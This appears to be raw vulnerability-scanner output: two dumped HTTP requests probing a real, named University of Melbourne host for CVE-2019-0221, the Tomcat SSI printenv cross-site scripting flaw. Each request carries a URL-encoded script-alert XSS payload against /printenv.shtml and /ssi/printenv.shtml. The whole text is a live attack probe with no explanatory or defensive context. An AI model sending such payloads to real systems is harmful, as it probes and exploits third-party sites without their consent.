[CVE-2019-0221] Dumped HTTP request for https://agoswiki.earthsci.unimelb.edu.au/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E


GET /printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E HTTP/1.1
Host: agoswiki.earthsci.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2019-0221] Dumped HTTP request for https://agoswiki.earthsci.unimelb.edu.au/ssi/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E


GET /ssi/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E HTTP/1.1
Host: agoswiki.earthsci.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


